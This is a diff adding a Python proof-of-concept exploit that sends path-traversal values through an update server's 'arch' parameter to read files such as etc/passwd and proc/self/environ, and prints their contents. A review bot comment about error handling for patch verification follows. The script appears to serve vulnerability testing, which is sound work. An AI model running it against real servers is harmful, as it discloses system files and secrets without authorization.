diff --git a/rosetta-sdu-2026-0000/poc1.py b/rosetta-sdu-2026-0000/poc1.py
new file mode 100644
index 0000000..076f3f4
--- /dev/null
+++ b/rosetta-sdu-2026-0000/poc1.py
@@ -0,0 +1,42 @@
+import sys
+import json
+from urllib.request import urlopen
+from urllib.error import URLError
+
+url = sys.argv[1] if len(sys.argv) > 1 else "http://UPDSRV:8080"
+url = url.rstrip("/")
+
+targets = [
+ "etc/hostname",
+ "etc/passwd",
+ "proc/1/cmdline",
+ "proc/self/environ",
+ "proc/cpuinfo",
+]
+
+for depth in range(1, 11):
+ up = "/".join([".."] * depth)
+ for target in targets:
+ arch = f"{up}/{target}"
+ params = f"platform=android&arch={arch}&app=1.0.0&kernel=0.0.0"
+ try:
+ with urlopen(f"{url}/updates/get?{params}", timeout=5) as resp:
+ data = json.loads(resp.read())
+ except (URLError, ValueError):
+ continue
+
+ update_needed = data.get("kernelUpdateRequired") or data.get("kernel_update_required")
+ kernel_url = data.get("kernelUrl") or data.get("kernel_url")
+
+ if update_needed and kernel_url and ".." in kernel_url:
+ print(f"Found: {kernel_url}")
+ try:
+ with urlopen(url + kernel_url, timeout=5) as f:
+ content = f.read().decode("utf-8", errors="replace")
+ print(content[:1000])
+ except URLError:
+ print("Failed to download file.")
+ sys.exit(0)
+
+print("Not vulnerable")
+sys.exit(1)
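Review bot: The closing `print("Not vulnerable")` / `sys.exit(1)` is reached both when the server answered every probe cleanly and when every request failed, because `except (URLError, ValueError): continue` discards connection and parse errors without recording them; an unreachable or mistyped host is therefore reported as not vulnerable, which makes the script unreliable as a patch-verification check. Set a flag such as `got_response = True` right after `json.loads(...)` and finish with `if not got_response: print("Inconclusive: no valid response"); sys.exit(2)` ahead of the negative verdict. The positive branch has the mirror problem: `sys.exit(0)` runs even after "Failed to download file.", so a server that only echoes `..` back in `kernelUrl` without serving the file still counts as a hit. `data.get` also assumes the JSON body is an object; `if not isinstance(data, dict): continue` avoids an uncaught AttributeError on a list or string body.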